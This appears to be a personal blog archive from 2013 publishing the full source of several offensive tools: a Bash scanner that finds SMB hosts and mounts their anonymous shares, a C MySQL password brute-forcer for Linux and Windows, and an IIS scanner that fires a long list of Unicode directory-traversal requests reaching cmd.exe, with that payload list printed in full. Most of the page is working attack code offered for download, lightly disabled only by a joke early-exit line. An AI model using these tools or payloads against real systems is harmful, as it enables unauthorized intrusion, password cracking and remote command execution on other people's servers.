Archiv für den Monat: Januar 2013

Samba / Netbios network scanner (SMBScan) for Linux

Simple Smb Scanner written in Bash for linux for oder Systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
TIMEOUT=5

#test -x $WHIP
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
clear

function script_kiddie() {
if [ $BUNT -eq 1 ]
then
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
	else
	    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
fi
exit 1 
}
script_kiddie

if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

check_it
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
while read host ;
    do
	# Get Computer name
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	kill -9 `pidof sleep` 2&>1
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    exist=0
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount */*/*
#umount `mount | grep smbfs | awk '{print $3}'`
kill -9 `ps aux | grep mount.cifs | awk '{print $2}'`

 

The Makefile for „make install“

PREFIX=/usr/sbin/
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh

 

 

MySQL Bruteforce for Linux and Windows

Linux Source and Binarys

mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar
(sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binarys

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// Deutsch oder English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

IISscan shell script

IIS Scanner

you can find this script also at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt

GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

 

Home

Hello and Welcome to bastardo.de

i have changed the design a little bit to a blog, it is easier to maintainace.

How ever ;) you can find here Sourcecodes and maybe some Information’s in the future about some little scripts i wrote also some tips for Administration
Hope you enjoy this site and have fun with my programs, if you find a code error don’t hesitate and write a comment.

At the moment i will list
MySQL Bruteforce for Linux and Windows
IISscan for Linux (Written in early 2000 for testing purposes )
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

you can find also informations about programming on my partner Site http://code-reference.com
a library about Programming